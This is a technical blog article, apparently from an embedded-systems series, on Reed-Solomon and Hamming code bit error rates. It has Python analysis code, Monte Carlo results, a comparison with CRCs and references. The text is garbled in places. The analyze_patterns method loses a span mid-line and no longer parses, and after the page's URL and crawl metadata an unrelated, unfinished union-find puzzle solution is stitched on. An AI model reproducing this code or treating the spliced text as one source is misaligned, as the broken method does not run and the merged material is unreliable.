This then lets us calculate the net error rate as \( (W_0(1-p)^7 + W_1 p(1-p)^6 + W_2 p^2(1-p)^5 + \ldots + W_6p^6(1-p) + W_7p^7) / 4 \):
W = H74b['weighted_count'] p = 0.01 r = sum(W[i]*(1-p)**(7-i)*p**i for i in xrange(8))/4 r
0.00087429879999999997
Even better!
Now let’s look at that bit error rate graph again, this time with both the curve for uncoded data, and with another curve representing the use of a Hamming (7,4) code.
# Helper functions for analyzing small Hamming codes (7,4) and (15,11) # and Reed-Solomon(255,k) codes import scipy.misc import scipy.stats class HammingAnalyzer(object): def __init__(self, poly): self.qr = GF2QuotientRing(poly) self.nparity = self.qr.degree self.n = (1 << self.nparity) - 1 self.k = self.n - self.nparity self.beta = self._calculate_beta() assert self.decode(1<<self.k) == 0 self.W = None def _calculate_beta(self): syndrome_msb = self.calculate_syndrome(1<<self.k) msb_pattern = self.qr.lshiftraw(1, self.k) beta = self.qr.divraw(msb_pattern, syndrome_msb) # Beta is calculated such that beta * syndrome(M) = M # for M = a codeword of all zeros with bit k = 1 # (all data bits are zero) return beta def calculate_syndrome(self, codeword): syndrome = 0 bitpos = 1 << self.n # clock in the codeword, then enough bits to cover the parity bits for _ in xrange(self.n + self.nparity): syndrome = self.qr.lshiftraw1(syndrome) if codeword & bitpos: syndrome ^= 1 bitpos >>= 1 return syndrome def decode(self, codeword, return_syndrome=False): syndrome = self.calculate_syndrome(codeword) data = codeword & ((1<<self.k) - 1) if syndrome == 0: error_pos=None else: # there are easier ways of computing a correction # to the data bits (I'm just not familiar with them) error_pos=self.qr.log(self.qr.mulraw(syndrome,self.beta)) if error_pos < self.k: data ^= (1<<error_pos) if return_syndrome: return data, syndrome, error_pos else: return data def analyze_patterns(self): data_mask = (1<<self.k) - 1 syndrome_to_correction_mask = np.zeros(1<<self.nparity, dtype=int) npatterns = (1<<self.n) patterns = np.arange(npatterns) syndromes = np.zeros(npatterns, dtype=int) bit_counts = np.zeros(npatterns, dtype=int) for i in xrange(self.n): error_pattern = 1<<i data, syndrome, error_pos = self & data_mask] # determine the number of errors in the corrected data bits return pd.DataFrame(dict(pattern=patterns, raw_error_count=bit_counts, correction_mask=correction_mask, corrected_pattern=corrected_patterns, received_error_count=received_error_count ), columns=['pattern', 'correction_mask','corrected_pattern', 'raw_error_count','received_error_count']) def analyze_stats(self): stats = (self.analyze_patterns() .groupby(['raw_error_count','received_error_count']) .agg({'pattern': 'count'}) .rename(columns={'pattern':'count'})) Ha = stats.reset_index() Hb = ((Ha['received_error_count']*Ha['count']) .groupby(Ha['raw_error_count']) .agg({'weighted_count':'sum'})) return Hb def bit_error_rate(self, p, **args): """ calculate data error rate given raw bit error rate p """ if self.W is None: self.W = self.analyze_stats()['weighted_count'] return sum(self.W[i]*(1-p)**(self.n-i)*p**i for i in xrange(self.n+1))/self.k @property def codename(self): return 'Hamming (%d,%d)' % (self.n, self.k) @property def rate(self): return 1.0*self.k/self.n class ReedSolomonAnalyzer(object): def __init__(self, n, k): self.n = n self.k = k self.t = (n-k)//2 def bit_error_rate(self, p, **args): r = 0 n = self.n ptotal = 0 # Probability of byte errors # = 1-(1-p)^8 # but we need to calculate it more robustly # for small values of p q = -np.expm1(8*np.log1p(-p)) qlist = [1.0] for v in xrange(n): qlist_new = [0]*(v+2) qlist_new[0] = qlist[0]*(1-q) qlist_new[v+1] = qlist[v]*q for i in xrange(1, v+1): qlist_new[i] = qlist[i]*(1-q) + qlist[i-1]*q qlist = qlist_new for v in xrange(n+1): # v errors w = self.output_error_count(v) pv = qlist[v] ptotal += pv r += w*pv # r is the number expected number of data bit errors # (can't be worse than 0.5) return np.minimum(0.5, r*1.0/self.k/8) @property def rate(self): return 1.0*self.k/self.n class ReedSolomonWorstCaseAnalyzer(ReedSolomonAnalyzer): @property def codename(self): return 'RS (%d,%d) worstcase' % (self.n, self.k) def output_error_count(self, v): if v <= self.t: return 0 # Pessimistic: if we have over t errors, # we correct the wrong t ones. # Oh, and it messes up the whole byte. return 8*min(self.k, v + self.t) class ReedSolomonBestCaseAnalyzer(ReedSolomonAnalyzer): @property def codename(self): return 'RS (%d,%d) bestcase' % (self.n, self.k) def output_error_count(self, v): # Optimistic: We always correct up to t errors. # And each of the symbol errors affect only 1 bit. return max(0, v-self.t) class ReedSolomonMonteCarloAnalyzer(ReedSolomonAnalyzer): def __init__(self, decoder): super(ReedSolomonMonteCarloAnalyzer, self).__init__(decoder.n, decoder.k) self.decoder = decoder @property def codename(self): return 'RS (%d,%d) Monte Carlo' % (self.n, self.k) def _sim(self, v, nsim, audit=False): """ Run random samples of decoding v bit errors from the zero codeword v: number of bit errors nsim: number of trials audit: whether to double-check that the 'where' array is correct (this is a temporary variable used to locate errors) Returns success_histogram: histogram of corrected codewords failure_histogram: histogram of uncorrected codewords For each trial we determine the number of bit errors ('count') in the corrected (or uncorrected) data. If the Reed-Solomon decoding succeeds, we add a sample to the success histogram, otherwise we add it to the failure histogram. Example: [4,0,0,5,1,6] indicates 4 samples with no bit errors, 5 samples with 3 bit errors, 1 sample with 4 bit errors, 6 samples with 5 bit errors. """ decoder = self.decoder n = decoder.n k = decoder.k success_histogram = np.array([0], int) failure_histogram = np.array([0], int) failures = 0 for _ in xrange(nsim): # Construct received message error_bitpos = np.random.choice(n*8, v, replace=False) e = np.zeros((v,n), int) e[np.arange(v), error_bitpos//8] = 1 << (error_bitpos & 7) e = e.sum(axis=0) # Decode received message try: msg, r = decoder.decode(e, nostrip=True, return_string=False) d = np.array(msg, dtype=np.uint8) # d = np.frombuffer(msg, dtype=np.uint8) success = True except: # Decoding error. Just use raw received message. d = e[:k] success = False where = np.array([(d>>j) & 1 for j in xrange(8)]) count = int(where.sum()) if success: if count >= len(success_histogram): success_histogram.resize(count+1) success_histogram[count] += 1 else: # yes this is essentially repeated code # but resize() is much easier # if we only have 1 object reference if count >= len(failure_histogram): failure_histogram.resize(count+1) failure_histogram[count] += 1 if audit: d2 = d.copy() bitlist,bytelist=where.nonzero() for bit,i in zip(bitlist,bytelist): d2[i] ^= 1<<bit assert not d2.any() return success_histogram, failure_histogram def _simulate_errors(self, nsimlist, verbose=False): decoder = self.decoder t = (decoder.n - decoder.k)//2 results = [] for i,nsim in enumerate(nsimlist): v = t+i if verbose: print "RS(%d,%d), %d errors (%d samples)" % ( decoder.n, decoder.k, v, nsim) results.append(self._sim(v, nsim)) return results def set_simulation_sample_counts(self, nsimlist): self.nsimlist = nsimlist return self def simulate(self, nsimlist=None, verbose=False): if nsimlist is None: nsimlist = self.nsimlist self.simulation_results = self._simulate_errors(nsimlist, verbose) return self def bit_error_rate(self, p, pbinom=None, **args): # Redone in terms of bit errors r = 0 ptotal = 0 p = np.atleast_1d(p) if pbinom is None: ncheck = 500 pbinom = scipy.stats.binom.pmf(np.atleast_2d(np.arange(ncheck)).T,self.n*8,p) for v in xrange(ncheck): # v errors w = self.output_error_count(v) pv = pbinom[v,:] ptotal += pv r += w*pv # r is the number expected number of data bit errors # (can't be worse than 0.5) return np.minimum(0.5, r*1.0/self.k/8) def output_error_count(self, v): # Estimate the number of data bit errors for v transmission bit errors. t = self.t if v <= t: return 0 simr = self.simulation_results if v-t < len(simr): sh, fh = simr[v-t] ns = sum(sh) ls = len(sh) nf = sum(fh) lf = len(fh) wt = ((sh*np.arange(ls)).sum() +(fh*np.arange(lf)).sum()) * 1.0 /(ns+nf) return wt else: # dumb estimate: same number of input errors return v
ebno_db = np.arange(-6,15,0.01) ebno = 10**(ebno_db/10) # Decibels are often confusing. # dB = 10 log10 x if x is measured in energy # dB = 20 log10 x if x is measured in amplitude. def dBE(x): return 10*np.log10(x) # Raw bit error probability p = Q(np.sqrt(2*ebno)) # Probability of at least 1 error: # This would be 1 - (1-p)^7 # but it's numerically problematic for low values of p. pH74_any_error = -np.expm1(7*np.log1p(-p)) pH74_upper_bound = pH74_any_error - 7*p*(1-p)**6 ha74 = HammingAnalyzer(0b1011) pH74 = ha74.bit_error_rate(p) plt.semilogy(dBE(ebno), p, label='uncoded') plt.semilogy(dBE(ebno*7/4), pH74_upper_bound, '--', label='Hamming (7,4) upper bound') plt.semilogy(dBE(ebno*7/4), pH74, label='Hamming (7,4)') plt.ylabel('Bit error rate',fontsize=12) plt.xlabel('$E_b/N_0$ (dB)',fontsize=12) plt.xlim(-6,14) plt.xticks(np.arange(-6,15,2)) plt.ylim(1e-12,1) plt.legend(loc='lower left',fontsize=10) plt.grid('on') plt.title('Bit error rate for raw binary pulses in AWGN channel\n' +'with integrate-and-dump receiver');
Both the exact calculation and the upper bound are fairly close.
We can do something similar with Reed-Solomon error rates. For an \( (n,k) = (255,255-2t) \) Reed-Solomon code, with transmitted bit error probability \( p \), the error probability per byte is \( q = 1 - (1-p)^8 \), and there are a couple of situations, given the number of byte errors \( v \) per 255-byte block:
- \( v \le t \): Reed-Solomon will decode them all correctly, and the number of decoded byte errors is zero.
- \( v > t \): More than \( t \) byte errors: This is the tricky part.
- Best-case estimate: we are lucky and the decoder actually corrects \( t \) errors, leading to \( v-t \) errors. This is ludicrously optimistic, but it does represent a lower bound on the bit error rate.
- Worst-case estimate: we are unlucky and the decoder alters \( t \) values which were correct, leading to \( v+t \) errors. This is ludicrously pessimistic, but it does represent an upper bound on the bit error rate.
- Empirical estimate: we can actually generate some random samples covering various numbers of errors, and see what a decoder actually does, then use the results to extrapolate a data bit error rate. This will be closer to the expected results, but it can take quite a bit of computation to generate enough random samples and run the decoder algorithm.
OK, now we’re going to tie all this together and show four graphs:
- Bit error rate of the decoded data (after error correction) vs. raw bit error rate during transmission. This tells us how much the error rate decreases.
- One graph will show large scale error rates.
- Another will show the same data in closer detail.
- Bit error rate of the decoded data vs. \( E_b/N_0 \). This lets us compare bit error rates by how much transmit energy they require to achieve that error rate.
- Effective gain in \( E_b/N_0 \), in decibels, vs. bit error rate of the decoded data.
# Codes under analysis: class RawAnalyzer(object): def bit_error_rate(self, p): return p @property def codename(self): return 'uncoded' @property def rate(self): return 1 ha74 = HammingAnalyzer(0b1011) ha1511 = HammingAnalyzer(0b10011) analyzers = [RawAnalyzer(), ha74, ha1511, ReedSolomonWorstCaseAnalyzer(255,253), ReedSolomonBestCaseAnalyzer(255,253), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,253,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[10000,5000,2000,1000,1000,1000,1000,1000] +[100]*10), ReedSolomonWorstCaseAnalyzer(255,251), ReedSolomonBestCaseAnalyzer(255,251), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,251,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[10000,5000,2000,1000,1000,1000,1000,1000] +[100]*5), ReedSolomonWorstCaseAnalyzer(255,247), ReedSolomonBestCaseAnalyzer(255,247), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,247,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[10000,5000,2000,1000,1000,1000,1000,1000] +[100]*5), ReedSolomonWorstCaseAnalyzer(255,239), ReedSolomonBestCaseAnalyzer(255,239), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,239,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[10000,5000,2000,1000,1000,1000,1000,1000]), ReedSolomonWorstCaseAnalyzer(255,223), ReedSolomonBestCaseAnalyzer(255,223), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,223,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[5000,2000,1000,500,500,500,500,500]), ReedSolomonWorstCaseAnalyzer(255,191), ReedSolomonBestCaseAnalyzer(255,191), ReedSolomonMonteCarloAnalyzer( rs.RSCoder(255,191,generator=2,prim=0x11d,fcr=0,c_exp=8)) .set_simulation_sample_counts([10] +[2000,1000,500,500,500,500,500,500]), ] styles = ['k','r','g','b--','b--','b','c--','c--','c', 'm--','m--','m', '#88ff00--','#88ff00--','#88ff00', '#ff8800--','#ff8800--','#ff8800', '#888888--','#888888--','#888888']
# Sigh. This takes a while. import time for analyzer in analyzers: if hasattr(analyzer, 'simulate'): print "RS(%d,%d)" % (analyzer.n, analyzer.k) np.random.seed(123) # just to make the Monte Carlo analysis repeatable t0 = time.time() analyzer.simulate() t1 = time.time() print "%.2f seconds" % (t1-t0)
RS(255,253) 42.47 seconds RS(255,251) 44.90 seconds RS(255,247) 62.66 seconds RS(255,239) 151.81 seconds RS(255,223) 197.57 seconds RS(255,191) 470.05 seconds
ebno_db = np.arange(-6,18,0.02) ebno = 10**(ebno_db/10) # Decibels are often confusing. # dB = 10 log10 x if x is measured in energy # dB = 20 log10 x if x is measured in amplitude. # Raw bit error probability p = Q(np.sqrt(2*ebno)) # Binomial distribution -- this is used by the RS Monte Carlo analyzers pbinom = scipy.stats.binom.pmf(np.atleast_2d(np.arange(800)).T,255*8,p) error_rates = [analyzer.bit_error_rate(p) for analyzer in analyzers]
colors = [s[:-2] if s.endswith('--') else s for s in styles] linestyles = ['--' if s.endswith('--') else '-' for s in styles] def label_for(analyzer): codename = analyzer.codename if codename.endswith(' worstcase'): return None elif codename.endswith(' bestcase'): return codename[:-8] + 'bounds' else: return codename # 1a and 1b. Raw vs. derived probability for xscale,yscale in [(1e-12,1e-20),(1e-5,1e-8)]: fig = plt.figure(figsize=(7,6)) ax = fig.add_subplot(1,1,1) for i, analyzer in enumerate(analyzers): p2 = error_rates[i] ax.loglog(p, p2, color=colors[i], linestyle=linestyles[i], label=label_for(analyzer)) ax.set_xlabel('Raw bit error rate') ax.set_ylabel('Data bit error rate') ax.legend(loc='upper left',fontsize=8, labelspacing=0, handlelength=3) ax.grid('on') ax.set_title('Code effect on data bit error rate') ax.set_xlim(xscale,0.5) ax.set_ylim(yscale,1) # 2. Data error rate vs. Eb/N0 fig = plt.figure(figsize=(7,6)) ax = fig.add_subplot(1,1,1) for i, analyzer in enumerate(analyzers): p2 = error_rates[i] ax.semilogy(dBE(ebno/analyzer.rate), p2, color=colors[i], linestyle=linestyles[i], label=label_for(analyzer)) ax.set_ylabel('Data bit error rate',fontsize=12) ax.set_xlabel('$E_b/N_0$ (dB)',fontsize=12) ax.set_xlim(-6,14) ax.set_xticks(np.arange(-6,15,2)) ax.set_ylim(1e-12,1) ax.legend(loc='lower left',fontsize=8, labelspacing=0, handlelength=3) ax.grid('on') ax.set_title('Data bit error rate for raw binary pulses in AWGN channel\n' +'with integrate-and-dump receiver'); # 3. Eb/No gain vs. data error rate fig = plt.figure(figsize=(7,6)) ax = fig.add_subplot(1,1,1) for i, analyzer in enumerate(analyzers): p2 = error_rates[i] ebno_equiv = Qinv(p2)**2/2 ax.semilogx(p2, dBE(ebno_equiv*analyzer.rate/ebno), color=colors[i], linestyle=linestyles[i], label=label_for(analyzer)) ax.set_xlim(1e-16,0.5) ax.set_ylim(-8,10) ax.set_yticks(np.arange(-8,10.1,2)) ax.legend(loc='lower left',fontsize=8, labelspacing=0, handlelength=3) ax.set_xlabel('Data bit error rate', fontsize=12) ax.set_ylabel('Gain (dB)', fontsize=12) ax.grid('on') ax.set_title('Effective $E_b/N_0$ gain vs data bit error rate');
OK, so what are we looking at here?
The top two graphs show us a few things:
At low channel bit error rates (= “raw bit error rate”), the effective data bit error rate can be made much lower. For example, at a \( 10^{-4} \) channel bit error rate, a Hamming (7,4) code can bring the effective data bit error rate down to about \( 10^{-7} \), and an RS(255,239) code can bring the effective data bit error rate down to about \( 10^{-14} \). Much lower, and we don’t have to sacrifice much bandwidth to do it; the code rate of RS(255,239) is 239/255 ≈ 0.9373.
At high channel bit error rates, on the other hand, the effective data bit error rate may not be much better, and may even be a little higher than the channel data bit error rate. It looks like on average this could be about a factor of 2 worse, in the cases of low-robustness Reed-Solomon codes like RS(255,253) and RS(255,251).
The meaning of “low” and “high” channel bit error rates depends on the coding technique used. Hamming codes are short, so you still see benefits from them at channel bit error rates as high as 0.2, whereas RS(255,251) doesn’t help decrease the error rate unless you have channel bit error rates below 0.0005, and the higher-robustness Reed-Solomon codes like RS(255,223) and RS(255,191) work well up to error rates of about 0.01.
The bottom two graphs show us how this reduction in effective bit error rate trades off against the \( E_b/N_0 \) penalty we get for using up part of our channel capacity for the redundancy of parity bits. (Remember, longer average transmission times per bit times mean that we need a larger \( E_b \) per encoded data bit.)
Hamming codes can gain between 0.5-1.5dB of \( E_b/N_0 \) compared to uncoded data, for the same effective data bit error rate.
Reed-Solomon codes can gain between 2-10dB of \( E_b/N_0 \) compare to uncoded data, for the same effective data bit error rate.
This gain works better at low channel bit error rates; the advantages in \( E_b/N_0 \) compared to uncoded data show up if the data bit error rate is somewhere below the 0.0001 to 0.01 range. Reed-Solomon codes beat Hamming codes once you get below about 0.005 data bit error rate, at least for the high-robustness codes; the Reed-Solomon codes which don’t add much redundancy, like RS(255,253), don’t beat Hamming codes unless the data bit error rate is below \( 10^{-7} \).
At high effective bit error rates, the coded messages can have worse performance in terms of \( E_b/N_0 \) for the same effective data bit error rate.
We generally want low effective bit error rates anyway; something in the \( 10^{-6} \) to \( 10^{-12} \) range is probably reasonable, depending on the application and how it is affected by errors. Those applications that have other higher-level layers which can handle retries in case of detected errors, can usually get away with bit error rates of \( 10^{-6} \) or even higher. Storage applications, on the other hand, need to keep errors low, because there’s no possible mechanism for retransmission; the only way to deal with it is to add another layer of error correction — which is something that is used in certain applications.
Why Not Use Reed-Solomon Instead of a CRC?
So here’s a question that might come to mind. Consider the following two pairs of cases:
- RS(255,253) vs. a 253-byte packet followed by a 16-bit CRC
- RS(255,251) vs. a 251-byte packet followed by a 32-bit CRC
Within each pair, there is the same overhead, and about the same encoding complexity and memory requirements if a lookup-table-based encoder is used. Decoders that check for the presence of transmission errors are essentially the same complexity as an encoder; it’s only the error-correction step that takes more CPU horsepower.
A CRC can be used to detect errors, but not to correct them. A Reed-Solomon code can be used to detect errors, up to 1 byte error in case of RS(255,253) and two byte errors in case of RS(255,251).
So why shouldn’t we be using Reed-Solomon instead of a CRC?
Well, CRCs are meant for detecting a small number of bit errors with guaranteed certainty. Reed-Solomon codes are designed to handle byte errors, and that means bursts of a byte or two, depending on the code parameters. So the nature of the received noise may make a big difference in terms of which is better. Noise models like AWGN, where the likelihood of any individual bit error is independent of any other, favor bit-error detection techniques; noise models in which multi-bit bursts are common will favor Reed-Solomon.
But the biggest impact is that by allowing error correction, we give up some of our ability to detect errors. I mentioned this toward the end of Part XV. Let’s look at it again.
Dry Imp Net Nrp Nmy
Let’s take a look at our fictitious
dry imp net encoding scheme again. Three codewords —
dry,
imp, and
net — and three symbols per word.
This encoding scheme has a Hamming distance of 3, which means we can detect up to 2 errors or correct up to 1 error.
If we don’t do any error correction, there are only 3 codewords out of 27 possible messages, so our ability to detect invalid messages is very good. The only way we’re going to misinterpret
dry as
imp or
net is if we happen to get the right kind of error to switch from one valid codeword to another, which needs three simultaneous errors.
On the other hand, if we do decide to use error correction, then all of a sudden we have 21 acceptable messages. By “acceptable” I mean a message that is either correct or correctable. If we get a message like
dmp that was originally
dry, sorry, we’re going to turn it into
imp, because that’s the closest codeword. The only unacceptable messages are
nrp,
nmy,
iey,
irt,
dmt, and
dep, which have a minimum distance of 2 to any codeword.
There are a few limited codes — Hamming codes are one of them — which have the property that there are no unacceptable messages. These are called perfect codes, and it means that any received message is either correct or can be corrected to the closest codeword. Here we have to assume that errors are infrequent, and if we do get more errors than we can correct, then we are just going to make an erroneous correction. Oh well.
I looked into this a little bit for Reed-Solomon codes. For \( RS(255,255-2t) \), it looks like \( t=1 \) is close to perfect, and \( t=2 \) isn’t too far away either, but as you start adding more redundancy symbols, the number of uncorrectable messages increases much faster than the number of correctable messages, and these boundaries around each codeword — which are called Hamming spheres, even though they’re more like N-dimensional hypercubes — cover less and less of the message space. Which is good, at least for error detection, because it means we’re more likely to be able to detect errors even if there are more than \( t \) of them.
Below is some data from the Monte Carlo simulations I used to compute bit error rates — this time presented a little differently, showing tables of what happens when there are more than \( t \) errors. Each random error pattern of \( v \) bit errors (and note that this may produce less than \( v \) byte errors, if more than one error occurs in the same byte) can have three outcomes:
CORRECT: the error pattern decodes correctly
FAIL: the decoding step fails, so we don’t change the received message, and the number of received errors stays the same
WORSEN: the error pattern decodes incorrectly, to a different codeword
The table shows the number of samples
nsample in each case, and the fraction of those samples that fall into the
CORRECT,
FAIL, and
WORSEN outcomes.
rsanalyzers = [analyzer for analyzer in analyzers if isinstance(analyzer, ReedSolomonMonteCarloAnalyzer)] def summarize_simulation_results(sr): shist, fhist = sr nfail = sum(fhist) nsample = nfail + sum(shist) ncorrect = shist[0] nworsen = sum(shist[1:]) return (nsample, ncorrect*1.0/nsample, nfail*1.0/nsample, nworsen*1.0/nsample) data = [(analyzer.n, analyzer.k, analyzer.t, i+analyzer.t) +summarize_simulation_results(sr) for analyzer in rsanalyzers for i, sr in enumerate(analyzer.simulation_results) if i > 0 and i <= 8] df = pd.DataFrame(data, columns='n k t v nsample ncorrect nfail nworsen'.split()) df.set_index(['n','k','t','v'])
The interesting trends here are
- For RS(255,253), with more than 1 error, the outcome is usually
WORSEN. With \( v=2 \) errors we occasionally get a successful correction. Compared to a 16-bit CRC, we risk making errors worse by trying to correct them, so unless we have a system with very low probability of 2 or more errors, we are better off using a 16-bit CRC and not trying to correct errors.
- For RS(255,251), with more than 2 errors, the outcome is about a 50-50 split between
FAILand
WORSEN. With \( v=3 \) errors we occasionally get a successful correction. Compared to a 32-bit CRC, we risk making errors worse by trying to correct them. It’s not as bad as RS(255,253), but a 50% chance of making things worse if there are three or more errors, makes it more attractive to use a 32-bit CRC.
- For RS(255,247), with more than 4 errors, the outcome is usually
FAILwith a small probability of
WORSEN. With \( v=4 \) and \( v=5 \) errors we occasionally get a successful correction. Compared to a 64-bit CRC, now the use of Reed-Solomon becomes much more attractive, at least for packets of length 255 or less.
- For RS(255,239) and other decoders with higher \( t \) values, the output almost never is
WORSEN. Probability of
CORRECTbecomes greater even though we are beyond the Hamming bound of at most \( t \) correctible errors. Reed-Solomon is very attractive, but the encoding cost starts to get higher.
These probabilities of a
WORSEN outcome are fairly close to their theoretical values, which are just the fraction of all possible messages which are within a Hamming distance of \( t \) of a valid codeword.
For example, if we have RS(255,253), then the last two bytes of valid codewords are completely dependent on the preceding bytes, so the fraction of valid codewords is \( 1/256^2 = 1/65536 \), and the fraction of all possible messages which are within a distance of 1 of those valid codewords is \( \frac{1 + 255 \times 255}{256^2} \approx 0.9922 \). For each codeword we have one message with distance 0 (the codeword itself) and \( 255 \times 255 \) messages with distance 1: each of the 255 message bytes can be corrupted with 255 other values.
Or if we have RS(255,251), this fraction becomes \( \frac{1 + 255 \times 255 + \frac{255 \times 254}{2} \times 255^2}{256^4} \approx 0.4903 \).
The general formula for this fraction is
$$\rho(t) = 256^{-2t}\sum\limits_{j=0}^t {255\choose j}255^j$$
which we can graph:
def rscoverage(t): y = 0 p = 1.0/256 x = 1.0 for k in xrange(t+1): u = x for j in xrange(2*t-k): if j < k: u *= 255.0/256 else: u *= p y += u x *= (255-k)/256.0 x /= k+1 return y tlist = np.arange(1,21) fig=plt.figure() ax=fig.add_subplot(1,1,1) ax.semilogy(tlist,[rscoverage(t) for t in tlist],'.') ax.set_title('Fraction of messages in $RS(255,255-2t)$\n within distance $t$ of a valid codeword') ax.set_xlabel('$t$',fontsize=12) ax.set_ylabel('$\\rho$',fontsize=12) ax.grid('on')
The sweet spot for low-end embedded systems is probably to use Reed-Solomon (255,247), where \( t=4 \). Possibly (255,239), where \( t=8 \). Smaller values of \( t \) allow a table-based implementation with a minimum amount of CPU time and memory; larger values of \( t \) lower the probability of erroneous correction.
But the most important thing is really to understand the behavior of errors in your system:
Probability of errors – run some tests and try to figure out the rate of errors without any attempt at error correction. A system with an average error rate of 1 error per \( 10^{6} \) bytes is a much different system to work with, than one that has an average error rate of 1 error per 1000 bytes.
Impact of errors – if you’re working with audio data, an error might sound like a brief “pop” in the sound, and this may not be a big deal. If you have a sensor gathering and transmitting data from a once-in-a-lifetime experiment, and losing data can make or break the results, then error correction coding is relatively cheap insurance.
Real-world Applications of Reed-Solomon Codes
Reed-Solomon codes are now in widespread use.
We already talked about the use of Reed-Solomon codes in the Voyager space probes from Uranus and Neptune onwards. They have been supplanted in more recent NASA missions, such as the Mars Reconaissance Encoder by turbo codes, which have higher \( E_b/N_0 \) gain.
Compact discs and DVDs use cross-interleaved Reed-Solomon encoding to increase the robustness against errors even if they show up as scratches impacting large numbers of bits.
Broadband data transmission systems like VDSL2 use Reed-Solomon codes to reduce error rates for a given transmitter energy.
The application I find most interesting is in QR codes, where Reed-Solomon codes are used along with a clever scheme to distribute the data bits spatially over a wide area. This makes them robust to severe data loss errors.
Normally you see QR code images like this:
But they can still be decoded even when part of the information has been corrupted, like this:
or this:
or even this:
I couldn’t find a QR code application that outputs the raw binary bits before decoding, but it would be interesting to see how many errors or erasures these images have. The four levels of error correction in a QR code, L, M, Q, and H, allow up to 30% errors by requiring more bits to encode a given message. The code above is an H-level code, and I kept adding larger and larger disturbances until the decoder was unable to process an image; these are slightly below the failure point, so they are probably in the 25-30% range.
Wrapup
OK! We’ve wandered around the topic of Reed-Solomon codes today, covering a few important points:
- Reed-Solomon codes represent messages as polynomials with coefficients in \( GF(2^m) \), and are often denoted as \( RS(n,k) \)
- The Reed-Solomon \( (255,255-2t) \) code is a common subset, representing a codeword as 255 bytes, each byte an element of \( GF(2^8) \). This allows for correction of up to \( t \) errors or \( 2t \) erasures.
- To specify a particular Reed-Solomon code, in addition to knowing \( n \) and \( k \), you need the characteristic polynomial of the symbol field — for \( GF(2^8) \), this is a degree 8 polynomial — and the generator polynomial, which is of the form \( g(x) = (x+\lambda^b)(x+\lambda^{b+1})(x+\lambda^{b+2})\ldots (x+\lambda^{b+2t-1}) \), where \( b \) is an integer and \( \lambda \) is any generating element in \( GF(2^8) \) — meaning that all nonzero elements of \( GF(2^8) \) are expressible as \( \lambda^i \) for some integer \( i \) between 0 and 254. The important property of \( g(x) \) is that its roots are \( 2t \) consecutive powers of \( \lambda \).
- Algebraically, encoding a message involves expressing it as a polynomial \( M(x) \), computing \( r(x) = x^{2t}M(x) \bmod g(x) \) and constructing the codeword \( C_t(x) = x^{2t}M(x) + r(x) \)
- In practical terms, we can encode a message using an LFSR where the shift cells contain elements of \( GF(2^8) \) and the LFSR taps are multiplier coefficients in \( GF(2^8) \), each tap corresponding to the corresponding coefficient in the generator polynomial.
- This LFSR approach can be implemented using lookup tables to handle the finite field mathematics
- Decoding takes considerably more processing power, and we didn’t cover the details in this article.
- Shortened Reed-Solomon codes are used by taking an \( (n,k) \) code and using it as an \( (n-l,k-l) \) code, where both transmitter and receiver assume that there are \( l \) implicit zeros at the beginning of the message.
- Calculating bit error rates is a pain. But if you do it right, you will end up with curves of data bit error rate vs. \( E_b/N_0 \), like this graph:
- Higher values of \( t \) reduce the code rate somewhat, but allow for greater gains in \( E_b/N_0 \) for the same data bit error rate. (Or alternatively, much lower data bit error rates for the same amount of signal energy per bit per unit noise.)
Use of error correction reduces the robustness to error detection, especially at low values of \( t \), but for \( t > 4 \) or so, the probability of mistakenly correcting more than \( t \) errors to the wrong codeword is very small. The vast majority of the time if there are more than \( t \) errors, the decoder just fails and the number of errors remains unchanged. There are cases with more than \( t \) errors where the decoder would produce a correction to the wrong codeword, but it has a low probability unless the errors are introduced intentionally.
Reed-Solomon has lots of applications for reducing the probability of errors: space transmission, storage formats like CDs and DVDs, QR codes, and DSL.
That’s all for today!
Next time we will tackle an interesting problem relating to CRCs.
References
Error-Correcting Codes:
- Gregory Mitchell, ARL-TR-4901: Investigation of Hamming, Reed-Solomon, and Turbo Forward Error Correcting Codes, US Army Research Laboratory, July 2009.
Reed-Solomon / BCH codes:
C.K.P. Clarke, WHP031: Reed-Solomon Error Correction, British Broadcasting Corporation, January 2002.
William Geisel, NASA Technical Memorandum 102162: Tutorial on Reed-Solomon Error Correction Coding, National Aeronautics and Space Administration, August 1990.
John Gill, EE 387 Notes 7: BCH and Reed-Solomon Codes, Stanford University, 2014.
Fabrizio Pollara, A Software Simulation Study of a (255,223) Reed-Solomon Encoder-decoder, Jet Propulsion Laboratory, JPL Publication 85-23, April 1985. (This report is interesting because it contains C code for both an encoder and decoder. I have not tried to use either, and it’s nearly unreadable code, using short cryptic identifiers everywhere.)
Duke University, CPS296 and notes on decoding.
Wikiversity, Reed-Solomon Codes for Coders
I. S. Reed and G. Solomon, Polynomial Codes over Certain Finite Fields, Journal of the Society for Industrial and Applied Mathematics, Volume 8, issue 2, pp. 300–304, June 1960.
Yasuo Sugiyama, Masao Kasahara, Shigeichi Hirasawa, and Toshihiko Namekawa, A Method for Solving Key Equation for Decoding Goppa Codes, Information and Control Volume 27, issue 1, January 1975, pp 87-99.
AWGN Channels:
- Dilip Sarwate, ECE 361: Lecture 3: Matched Filters – Part I, 2011. This has the equation for determining the variance of received white noise after it goes through a filter \( h(t) \).
QR Codes:
- Bill Casselman, How to Read QR Symbols Without Your Mobile Telephone, American Mathematical Society, 2013.
Previous post by Jason Sachs:
Linear Feedback Shift Registers for the Uninitiated, Part XV: Error Detection and Correction
Next post by Jason Sachs:
Linear Feedback Shift Registers for the Uninitiated, Part XVII: Reverse-Engineering the CRC
-.
|
https://www.embeddedrelated.com/showarticle/1182.php
|
CC-MAIN-2019-47
|
refinedweb
| 18,206
| 61.8
|
First solution in Clear category for City's Happiness by arbores401
def find(grp, a):
if grp[a] == a:
return a
grp[a] = find(grp, grp[a])
return grp[a]
def union(grp, a, b):
x, y = sorted([find(grp, a), find(grp, b)], key=grp.__getitem__)
if x != y:
grp[y] = x
def score_when_city_removed(net, users, remove_city):
